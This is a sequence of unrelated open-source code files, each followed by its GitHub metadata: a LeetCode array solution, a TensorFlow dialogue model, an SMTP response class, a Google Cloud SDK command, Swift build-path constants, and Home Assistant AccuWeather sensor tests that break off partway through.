reached_zero_count = 0
for idx, num in enumerate(nums):
if num == 0:
reached_zero_count += 1
if num != 0:
if reached_zero_count > 0: # make sure has reached at least a zero.
nums[idx - reached_zero_count] = num
nums[idx] = 0
def test_func(nums, result):
Solution().moveZeroes(nums)
assert nums == result, [nums, result]
test_func([], [])
test_func([0], [0])
test_func([1], [1])
test_func([0, 0], [0, 0])
test_func([0, 1], [1, 0])
test_func([1, 1], [1, 1])
test_func([0, 1, 0, 3, 12], [1, 3, 12, 0, 0])
test_func([0, 1, 0, 3, 12, 0], [1, 3, 12, 0, 0, 0])
test_func([0, 1, 0, 0, 0, 3, 12, 0], [1, 3, 12, 0, 0, 0, 0, 0])
| {
"content_hash": "3fa87657d823a1addc1a220981d30967",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 137,
"avg_line_length": 31.76,
"alnum_prop": 0.5831234256926953,
"repo_name": "mvj3/leetcode",
"id": "072ffab7952ab060435d2351802fd88b1342db66",
"size": "1588",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "283-move-zeroes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "122862"
}
],
"symlink_target": ""
} |
import sys
import tensorflow as tf
from model import ModelW2T
from tfx.bricks import embedding, dense_to_one_hot, linear, conv2d, dropout, reduce_max, batch_norm_lin, conv2d_bn, \
pow_1, max_pool
class Model(ModelW2T):
def __init__(self, data, FLAGS):
super(Model, self).__init__(data, FLAGS)
conv_mul = 2
histories_embedding_size = 16
histories_vocabulary_length = len(data.idx2word_history)
histories_utterance_length = data.train_set['histories'].shape[2]
history_length = data.train_set['histories'].shape[1]
action_templates_vocabulary_length = len(data.idx2word_action_template)
with tf.name_scope('data'):
batch_histories = tf.Variable(data.batch_histories, name='histories',
trainable=False)
batch_actions_template = tf.Variable(data.batch_actions_template, name='actions',
trainable=False)
histories = tf.gather(batch_histories, self.batch_idx)
actions_template = tf.gather(batch_actions_template, self.batch_idx)
with tf.name_scope('model'):
with tf.variable_scope("batch_size"):
batch_size = tf.shape(histories)[0]
encoder_embedding = embedding(
input=histories,
length=histories_vocabulary_length,
size=histories_embedding_size,
name='encoder_embedding'
)
with tf.name_scope("UtterancesEncoder"):
conv3 = encoder_embedding
# conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[1, 3, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_utt_size_3_layer_1'
)
encoded_utterances = reduce_max(conv3, [2], keep_dims=True)
with tf.name_scope("HistoryEncoder"):
conv3 = encoded_utterances
conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[3, 1, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_hist_size_3_layer_1'
)
conv3 = max_pool(conv3, ksize=[1, 2, 1, 1], strides=[1, 2, 1, 1])
conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[3, 1, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_hist_size_3_layer_2'
)
encoded_history = reduce_max(conv3, [1, 2])
with tf.name_scope("Decoder"):
second_to_last_user_utterance = encoded_utterances[:, history_length - 3, 0, :]
last_system_utterance = encoded_utterances[:, history_length - 2, 0, :]
last_user_utterance = encoded_utterances[:, history_length - 1, 0, :]
dialogue_state = tf.concat(
1,
[
encoded_history,
last_user_utterance,
last_system_utterance,
second_to_last_user_utterance,
],
name='dialogue_state'
)
dialogue_state_size = conv3.size + \
3 * histories_embedding_size * conv_mul
activation = tf.nn.relu(dialogue_state)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=dialogue_state_size,
name='linear_projection_1'
)
projection = batch_norm_lin(projection, dialogue_state_size, self.phase_train, name='linear_projection_1_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=dialogue_state_size,
name='linear_projection_2'
)
projection = batch_norm_lin(projection, dialogue_state_size, self.phase_train, name='linear_projection_2_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=action_templates_vocabulary_length,
name='linear_projection_3'
)
self.predictions = tf.nn.softmax(projection, name="softmax_output")
# print(self.predictions)
if FLAGS.print_variables:
for v in tf.trainable_variables():
print(v.name)
with tf.name_scope('loss'):
one_hot_labels = dense_to_one_hot(actions_template, action_templates_vocabulary_length)
self.loss = tf.reduce_mean(- one_hot_labels * tf.log(tf.clip_by_value(self.predictions, 1e-10, 1.0)), name='loss')
# self.loss = tf.reduce_mean(- one_hot_labels * tf.log(self.predictions), name='loss')
tf.scalar_summary('loss', self.loss)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(tf.argmax(one_hot_labels, 1), tf.argmax(self.predictions, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))
tf.scalar_summary('accuracy', self.accuracy)
| {
"content_hash": "546e1700a28a4b8586b83a013acb52d8",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 126,
"avg_line_length": 45.14598540145985,
"alnum_prop": 0.5154405820533549,
"repo_name": "jurcicek/ndm",
"id": "5be6691f4ed4115dc34b5c04f7ba434a40f5491b",
"size": "6208",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ndm/model_cnn12_mp_bn_w2t.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "251831"
},
{
"name": "Shell",
"bytes": "739"
}
],
"symlink_target": ""
} |
"""
mailthon.response
~~~~~~~~~~~~~~~~~
Response objects encapsulate responses returned
by SMTP servers.
:copyright: (c) 2015 by Eeo Jun
:license: MIT, see LICENSE for details.
"""
from collections import namedtuple
_ResponseBase = namedtuple('Response', ['status_code', 'reason'])
class Response(_ResponseBase):
"""
Encapsulates a (status_code, message) tuple
returned by a server when the ``NOOP``
command is called.
:param status_code: status code returned by server.
:param message: error/success message.
"""
@property
def ok(self):
"""
Returns true if the status code is 250, false
otherwise.
"""
return self.status_code == 250
class SendmailResponse:
"""
Encapsulates a (status_code, reason) tuple
as well as a mapping of email-address to
(status_code, reason) tuples that can be
attained by the NOOP and the SENDMAIL
command.
:param pair: The response pair.
:param rejected: Dictionary of rejected
addresses to status-code reason pairs.
"""
def __init__(self, status_code, reason, rejected):
self.res = Response(status_code, reason)
self.rejected = {}
for addr, pair in rejected.items():
self.rejected[addr] = Response(*pair)
@property
def ok(self):
"""
Returns True only if no addresses were
rejected and if the status code is 250.
"""
return self.res.ok and not self.rejected
| {
"content_hash": "94cb522044fa61b5816c4ca309c6c91f",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 65,
"avg_line_length": 24.70967741935484,
"alnum_prop": 0.6207571801566579,
"repo_name": "eugene-eeo/mailthon",
"id": "d1b57035f366346abe36787625af83584aa496b6",
"size": "1532",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mailthon/response.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42466"
}
],
"symlink_target": ""
} |
"""Command for creating target instances."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.instances import (flags as
instance_flags)
from googlecloudsdk.command_lib.compute.target_instances import flags
class Create(base_classes.BaseAsyncCreator):
"""Create a target instance for handling traffic from a forwarding rule."""
INSTANCE_ARG = None
TARGET_INSTANCE_ARG = None
@classmethod
def Args(cls, parser):
cls.INSTANCE_ARG = instance_flags.InstanceArgumentForTargetInstance()
cls.INSTANCE_ARG.AddArgument(parser)
cls.TARGET_INSTANCE_ARG = flags.TargetInstanceArgument()
cls.TARGET_INSTANCE_ARG.AddArgument(
parser, operation_type='create the target instance in')
parser.add_argument(
'--description',
help='An optional, textual description of the target instance.')
@property
def service(self):
return self.compute.targetInstances
@property
def method(self):
return 'Insert'
@property
def resource_type(self):
return 'targetInstances'
def CreateRequests(self, args):
target_instance_ref = self.TARGET_INSTANCE_ARG.ResolveAsResource(
args,
self.resources,
scope_lister=compute_flags.GetDefaultScopeLister(self.compute_client,
self.project))
if target_instance_ref.zone and not args.instance_zone:
args.instance_zone = target_instance_ref.zone
instance_ref = self.INSTANCE_ARG.ResolveAsResource(args, self.resources)
if target_instance_ref.zone != instance_ref.zone:
raise calliope_exceptions.ToolException(
'Target instance zone must match the virtual machine instance zone.')
request = self.messages.ComputeTargetInstancesInsertRequest(
targetInstance=self.messages.TargetInstance(
description=args.description,
name=target_instance_ref.Name(),
instance=instance_ref.SelfLink(),
),
project=self.project,
zone=target_instance_ref.zone)
return [request]
Create.detailed_help = {
'brief': (
'Create a target instance for handling traffic from a forwarding rule'),
'DESCRIPTION': """\
*{command}* is used to create a target instance for handling
traffic from one or more forwarding rules. Target instances
are ideal for traffic that should be managed by a single
source. For more information on target instances, see
[](https://cloud.google.com/compute/docs/protocol-forwarding/#targetinstances)
""",
}
| {
"content_hash": "7827d5302613fbdd1b541e76cd8a41ac",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 86,
"avg_line_length": 35.075,
"alnum_prop": 0.688168210976479,
"repo_name": "Sorsly/subtle",
"id": "8260fa336d41219c832956ac3a74624e9d0baae8",
"size": "3401",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "google-cloud-sdk/lib/surface/compute/target_instances/create.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1581"
},
{
"name": "CSS",
"bytes": "226"
},
{
"name": "HTML",
"bytes": "4637"
},
{
"name": "JavaScript",
"bytes": "3037"
},
{
"name": "PHP",
"bytes": "4543"
},
{
"name": "Pascal",
"bytes": "31"
},
{
"name": "Python",
"bytes": "13243860"
},
{
"name": "Roff",
"bytes": "1050600"
},
{
"name": "Shell",
"bytes": "16136"
},
{
"name": "Smarty",
"bytes": "2484"
},
{
"name": "SourcePawn",
"bytes": "308"
}
],
"symlink_target": ""
} |
import os.path
__all__ = [
"BUILD_SCRIPT_IMPL_PATH",
"BUILD_SCRIPT_PATH",
"BUILD_SWIFT_PATH",
"MODULE_PATH",
"MULTIROOT_DATA_FILE_PATH",
"PROJECT_PATH",
"RESOURCES_PATH",
"SWIFT_BUILD_ROOT",
"SWIFT_REPO_NAME",
"SWIFT_SOURCE_ROOT",
"UTILS_PATH",
]
# --------------------------------------------------------------------------------------
# Project Paths
MODULE_PATH = os.path.abspath(os.path.dirname(__file__))
BUILD_SWIFT_PATH = os.path.dirname(MODULE_PATH)
UTILS_PATH = os.path.dirname(BUILD_SWIFT_PATH)
PROJECT_PATH = os.path.dirname(UTILS_PATH)
BUILD_SCRIPT_PATH = os.path.join(UTILS_PATH, "build-script")
BUILD_SCRIPT_IMPL_PATH = os.path.join(UTILS_PATH, "build-script-impl")
# --------------------------------------------------------------------------------------
# Resources
RESOURCES_PATH = os.path.join(BUILD_SWIFT_PATH, "resources")
# The path to the Xcode workspace to use for a unified build of multiple SwiftPM
# projects.
MULTIROOT_DATA_FILE_PATH = os.path.join(
RESOURCES_PATH, "SwiftPM-Unified-Build.xcworkspace"
)
# --------------------------------------------------------------------------------------
# Helpers
def _is_llvm_checkout(llvm_path):
"""Returns true if the given llvm_path is a valid LLVM checkout, false otherwise.
NOTE: This is a very naive validation, checking only for the existence of a few
known files.
"""
if not os.path.exists(os.path.join(llvm_path, "tools")):
return False
if not os.path.exists(os.path.join(llvm_path, "CMakeLists.txt")):
return False
return True
def _is_swift_checkout(swift_path):
"""Returns true if the given swift_path is a valid Swift checkout, false otherwise.
NOTE: This is a very naive validation, checking only for the existence of a few
known files.
"""
if not os.path.exists(os.path.join(swift_path, "utils")):
return False
if not os.path.exists(os.path.join(swift_path, "CMakeLists.txt")):
return False
return True
def _get_swift_source_root(swift_path, env=None):
"""Returns the Swift source root or None if one cannot be determined.
Users are able to manually override the source root by setting the SWIFT_SOURCE_ROOT
environment variable. If that cannot be found then this function will check the
directory structure to infer if we are building as a standalone Swift build or if we
are building in the unified LLVM.
Building standalone means Swift will be checked out as a peer of LLVM and the
enclosing directory is the source root.
source-root/
|- llvm/
|- swift/
| ...
However the unified case means Swift will be checked out in the llvm/tools
directory, which means the directory containing LLVM is the source root.
source-root/
|- llvm/
| |- tools/
| | |- swift/
| | | ...
| | ...
| ...
In the case that this function is called with an invalid Swift checkout it returns
None as well.
FIXME: What about the new llvm-project monorepo?
"""
env = env or {}
# Check the environment first.
if "SWIFT_SOURCE_ROOT" in env:
return env["SWIFT_SOURCE_ROOT"]
# Assert we are in a valid Swift checkout.
if not _is_swift_checkout(swift_path):
return None
source_root = os.path.dirname(swift_path)
# Check if Swift is checked out as part of a unified build.
if os.path.basename(source_root) != "tools":
return source_root
llvm_path = os.path.dirname(source_root)
if not _is_llvm_checkout(llvm_path):
return source_root
# Return the directory containing LLVM.
return os.path.dirname(llvm_path)
def _get_swift_build_root(source_root, env=None):
"""Returns the Swift build root.
Users are able to manually override the build root by setting the SWIFT_BUILD_ROOT
environment variable. If that cannot be found then this function returns the path
to a directory named "build" in the given source root.
"""
env = env or {}
if "SWIFT_BUILD_ROOT" in env:
return env["SWIFT_BUILD_ROOT"]
return os.path.join(source_root, "build")
def _get_swift_repo_name(swift_path, env=None):
"""Returns the Swift repo name or None if it cannot be determined.
Users are able to manually override the repo name by setting the SWIFT_REPO_NAME
environment variable. If that cannot be found then this function returns the name
of the given swift path or None if it is not a valid Swift checkout.
"""
env = env or {}
if "SWIFT_REPO_NAME" in env:
return env["SWIFT_REPO_NAME"]
if not _is_swift_checkout(swift_path):
return None
return os.path.basename(swift_path)
# --------------------------------------------------------------------------------------
# Swift Source and Build Roots
# Set SWIFT_SOURCE_ROOT in your environment to control where the sources are found.
SWIFT_SOURCE_ROOT = _get_swift_source_root(PROJECT_PATH, env=os.environ)
# Set SWIFT_BUILD_ROOT to a directory that will contain a subdirectory for each build
# configuration
SWIFT_BUILD_ROOT = _get_swift_build_root(SWIFT_SOURCE_ROOT, env=os.environ)
# Set SWIFT_REPO_NAME in your environment to control the name of the swift directory
# name that is used.
SWIFT_REPO_NAME = _get_swift_repo_name(PROJECT_PATH, env=os.environ)
| {
"content_hash": "5b161f4e40d908521b51af0d9480d97c",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 88,
"avg_line_length": 28.380208333333332,
"alnum_prop": 0.6314920168838319,
"repo_name": "atrick/swift",
"id": "9de8475b262ffa6f84d47f32cc7a257641c88ce9",
"size": "5794",
"binary": false,
"copies": "8",
"ref": "refs/heads/main",
"path": "utils/build_swift/build_swift/constants.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "45870"
},
{
"name": "C",
"bytes": "5438354"
},
{
"name": "C++",
"bytes": "47043407"
},
{
"name": "CMake",
"bytes": "690778"
},
{
"name": "D",
"bytes": "1107"
},
{
"name": "DTrace",
"bytes": "2593"
},
{
"name": "Emacs Lisp",
"bytes": "57594"
},
{
"name": "LLVM",
"bytes": "74481"
},
{
"name": "Makefile",
"bytes": "2361"
},
{
"name": "Objective-C",
"bytes": "465384"
},
{
"name": "Objective-C++",
"bytes": "159688"
},
{
"name": "Python",
"bytes": "1967178"
},
{
"name": "Roff",
"bytes": "3683"
},
{
"name": "Ruby",
"bytes": "2132"
},
{
"name": "Shell",
"bytes": "214879"
},
{
"name": "Swift",
"bytes": "38555942"
},
{
"name": "Vim Script",
"bytes": "20025"
},
{
"name": "sed",
"bytes": "1050"
}
],
"symlink_target": ""
} |
"""Test sensor of AccuWeather integration."""
from datetime import timedelta
import json
from homeassistant.components.accuweather.const import (
ATTRIBUTION,
CONCENTRATION_PARTS_PER_CUBIC_METER,
DOMAIN,
LENGTH_MILIMETERS,
)
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_ICON,
ATTR_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_TEMPERATURE,
LENGTH_METERS,
PERCENTAGE,
SPEED_KILOMETERS_PER_HOUR,
STATE_UNAVAILABLE,
TEMP_CELSIUS,
TIME_HOURS,
UV_INDEX,
)
from homeassistant.setup import async_setup_component
from homeassistant.util.dt import utcnow
from tests.async_mock import patch
from tests.common import async_fire_time_changed, load_fixture
from tests.components.accuweather import init_integration
async def test_sensor_without_forecast(hass):
"""Test states of the sensor without forecast."""
await init_integration(hass)
registry = await hass.helpers.entity_registry.async_get_registry()
state = hass.states.get("sensor.home_cloud_ceiling")
assert state
assert state.state == "3200"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_ICON) == "mdi:weather-fog"
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == LENGTH_METERS
entry = registry.async_get("sensor.home_cloud_ceiling")
assert entry
assert entry.unique_id == "0123456-ceiling"
state = hass.states.get("sensor.home_precipitation")
assert state
assert state.state == "0.0"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == LENGTH_MILIMETERS
assert state.attributes.get(ATTR_ICON) == "mdi:weather-rainy"
assert state.attributes.get("type") is None
entry = registry.async_get("sensor.home_precipitation")
assert entry
assert entry.unique_id == "0123456-precipitation"
state = hass.states.get("sensor.home_pressure_tendency")
assert state
assert state.state == "falling"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_ICON) == "mdi:gauge"
assert state.attributes.get(ATTR_DEVICE_CLASS) == "accuweather__pressure_tendency"
entry = registry.async_get("sensor.home_pressure_tendency")
assert entry
assert entry.unique_id == "0123456-pressuretendency"
state = hass.states.get("sensor.home_realfeel_temperature")
assert state
assert state.state == "25.1"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_realfeel_temperature")
assert entry
assert entry.unique_id == "0123456-realfeeltemperature"
state = hass.states.get("sensor.home_uv_index")
assert state
assert state.state == "6"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == UV_INDEX
assert state.attributes.get("level") == "High"
entry = registry.async_get("sensor.home_uv_index")
assert entry
assert entry.unique_id == "0123456-uvindex"
async def test_sensor_with_forecast(hass):
"""Test states of the sensor with forecast."""
await init_integration(hass, forecast=True)
registry = await hass.helpers.entity_registry.async_get_registry()
state = hass.states.get("sensor.home_hours_of_sun_0d")
assert state
assert state.state == "7.2"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_ICON) == "mdi:weather-partly-cloudy"
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TIME_HOURS
entry = registry.async_get("sensor.home_hours_of_sun_0d")
assert entry
assert entry.unique_id == "0123456-hoursofsun-0"
state = hass.states.get("sensor.home_realfeel_temperature_max_0d")
assert state
assert state.state == "29.8"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_realfeel_temperature_max_0d")
assert entry
state = hass.states.get("sensor.home_realfeel_temperature_min_0d")
assert state
assert state.state == "15.1"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_realfeel_temperature_min_0d")
assert entry
assert entry.unique_id == "0123456-realfeeltemperaturemin-0"
state = hass.states.get("sensor.home_thunderstorm_probability_day_0d")
assert state
assert state.state == "40"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_ICON) == "mdi:weather-lightning"
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.home_thunderstorm_probability_day_0d")
assert entry
assert entry.unique_id == "0123456-thunderstormprobabilityday-0"
state = hass.states.get("sensor.home_thunderstorm_probability_night_0d")
assert state
assert state.state == "40"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_ICON) == "mdi:weather-lightning"
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
entry = registry.async_get("sensor.home_thunderstorm_probability_night_0d")
assert entry
assert entry.unique_id == "0123456-thunderstormprobabilitynight-0"
state = hass.states.get("sensor.home_uv_index_0d")
assert state
assert state.state == "5"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_ICON) == "mdi:weather-sunny"
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == UV_INDEX
assert state.attributes.get("level") == "Moderate"
entry = registry.async_get("sensor.home_uv_index_0d")
assert entry
assert entry.unique_id == "0123456-uvindex-0"
async def test_sensor_disabled(hass):
"""Test sensor disabled by default."""
await init_integration(hass)
registry = await hass.helpers.entity_registry.async_get_registry()
entry = registry.async_get("sensor.home_apparent_temperature")
assert entry
assert entry.unique_id == "0123456-apparenttemperature"
assert entry.disabled
assert entry.disabled_by == "integration"
# Test enabling entity
updated_entry = registry.async_update_entity(
entry.entity_id, **{"disabled_by": None}
)
assert updated_entry != entry
assert updated_entry.disabled is False
async def test_sensor_enabled_without_forecast(hass):
"""Test enabling an advanced sensor."""
registry = await hass.helpers.entity_registry.async_get_registry()
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-apparenttemperature",
suggested_object_id="home_apparent_temperature",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-cloudcover",
suggested_object_id="home_cloud_cover",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-dewpoint",
suggested_object_id="home_dew_point",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-realfeeltemperatureshade",
suggested_object_id="home_realfeel_temperature_shade",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-wetbulbtemperature",
suggested_object_id="home_wet_bulb_temperature",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-windchilltemperature",
suggested_object_id="home_wind_chill_temperature",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-windgust",
suggested_object_id="home_wind_gust",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-cloudcoverday-0",
suggested_object_id="home_cloud_cover_day_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-cloudcovernight-0",
suggested_object_id="home_cloud_cover_night_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-grass-0",
suggested_object_id="home_grass_pollen_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-mold-0",
suggested_object_id="home_mold_pollen_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-ozone-0",
suggested_object_id="home_ozone_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-ragweed-0",
suggested_object_id="home_ragweed_pollen_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-realfeeltemperatureshademax-0",
suggested_object_id="home_realfeel_temperature_shade_max_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-realfeeltemperatureshademin-0",
suggested_object_id="home_realfeel_temperature_shade_min_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-tree-0",
suggested_object_id="home_tree_pollen_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-windgustday-0",
suggested_object_id="home_wind_gust_day_0d",
disabled_by=None,
)
registry.async_get_or_create(
SENSOR_DOMAIN,
DOMAIN,
"0123456-windgustnight-0",
suggested_object_id="home_wind_gust_night_0d",
disabled_by=None,
)
await init_integration(hass, forecast=True)
state = hass.states.get("sensor.home_apparent_temperature")
assert state
assert state.state == "22.8"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_apparent_temperature")
assert entry
assert entry.unique_id == "0123456-apparenttemperature"
state = hass.states.get("sensor.home_cloud_cover")
assert state
assert state.state == "10"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
assert state.attributes.get(ATTR_ICON) == "mdi:weather-cloudy"
entry = registry.async_get("sensor.home_cloud_cover")
assert entry
assert entry.unique_id == "0123456-cloudcover"
state = hass.states.get("sensor.home_dew_point")
assert state
assert state.state == "16.2"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_dew_point")
assert entry
assert entry.unique_id == "0123456-dewpoint"
state = hass.states.get("sensor.home_realfeel_temperature_shade")
assert state
assert state.state == "21.1"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_realfeel_temperature_shade")
assert entry
assert entry.unique_id == "0123456-realfeeltemperatureshade"
state = hass.states.get("sensor.home_wet_bulb_temperature")
assert state
assert state.state == "18.6"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_wet_bulb_temperature")
assert entry
assert entry.unique_id == "0123456-wetbulbtemperature"
state = hass.states.get("sensor.home_wind_chill_temperature")
assert state
assert state.state == "22.8"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == TEMP_CELSIUS
assert state.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_TEMPERATURE
entry = registry.async_get("sensor.home_wind_chill_temperature")
assert entry
assert entry.unique_id == "0123456-windchilltemperature"
state = hass.states.get("sensor.home_wind_gust")
assert state
assert state.state == "20.3"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == SPEED_KILOMETERS_PER_HOUR
assert state.attributes.get(ATTR_ICON) == "mdi:weather-windy"
entry = registry.async_get("sensor.home_wind_gust")
assert entry
assert entry.unique_id == "0123456-windgust"
state = hass.states.get("sensor.home_cloud_cover_day_0d")
assert state
assert state.state == "58"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
assert state.attributes.get(ATTR_ICON) == "mdi:weather-cloudy"
entry = registry.async_get("sensor.home_cloud_cover_day_0d")
assert entry
assert entry.unique_id == "0123456-cloudcoverday-0"
state = hass.states.get("sensor.home_cloud_cover_night_0d")
assert state
assert state.state == "65"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == PERCENTAGE
assert state.attributes.get(ATTR_ICON) == "mdi:weather-cloudy"
entry = registry.async_get("sensor.home_cloud_cover_night_0d")
assert entry
state = hass.states.get("sensor.home_grass_pollen_0d")
assert state
assert state.state == "0"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_PARTS_PER_CUBIC_METER
)
assert state.attributes.get("level") == "Low"
assert state.attributes.get(ATTR_ICON) == "mdi:grass"
entry = registry.async_get("sensor.home_grass_pollen_0d")
assert entry
assert entry.unique_id == "0123456-grass-0"
state = hass.states.get("sensor.home_mold_pollen_0d")
assert state
assert state.state == "0"
assert state.attributes.get(ATTR_ATTRIBUTION) == ATTRIBUTION
assert (
state.attributes.get(ATTR_UNIT_OF_MEASUREMENT)
== CONCENTRATION_PARTS_PER_CUBIC_METER
)
assert state.attributes.get("level") == "Low"
